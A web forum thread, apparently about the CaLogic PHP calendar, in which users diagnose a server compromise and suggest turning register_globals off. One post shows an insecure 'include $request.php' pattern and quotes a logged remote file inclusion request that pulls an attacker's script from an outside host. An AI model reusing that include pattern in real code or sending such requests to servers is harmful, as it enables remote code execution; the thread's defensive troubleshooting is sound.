I have replied to your mail Mitch... hope the issue is resolved

Philip

----------------
-- there is no spoon

Quote:

Please reply to the e-mail i have sent you.
about this

----------------
Mitch

Hi,

as far as I know, CaLogic has no more security / code injection errors. If you find any, please let me know. before the hackers do.. thanks

Philip

----------------
-- there is no spoon

My server had php script like this:

www.mydomain.com/index.php?request=abc

and abc was phph scrpt that was included like this:
=======
include header.php
include $request.php
include footer.php
========

From my web logs, my site was called like:
www.mydomain.com/index.php?request=http://f58.aaa.livedoor.jp/~picapau/tool25.dat?&cmd=w

where the funny japanese site has the php script that did all the damage.

I am busy rewriting the index.php.

Hope it helps.

Thanks to everyone for all the tipps, help, and above all patience in this matter.

Philip

----------------
-- there is no spoon

Hi,

i tried Franks great tip, but my provider won't let me set php_flags in .htaccess files.

But they allowed to me to use a php.ini file only containing only the line

register_globals=off

CAUTION!
Unline .htacess the php.ini does NOT work recursively and has to be copied to EVERY directory that should be protected.

Have fun

Andy

Under Apache one can disable register_globals

in an .htaccess file per directory with the statement

php_flag register_globals off

But I'm not sure whether commercial providers leave this opportunity to their clients.


Frank

Thanks

----------------
-- there is no spoon

ok, please forgive, it's doing an include after that and the include is the problem we know

calogic is still the best calendar ever seen. anyway i will take my time to let this settle

nobody's perfect

what about the isset() instructions? i read that they could be misused too, if the parameters are not checked.

like described here?
http://www.devshed.com/c/a/PHP/PHP-Security-Mistakes/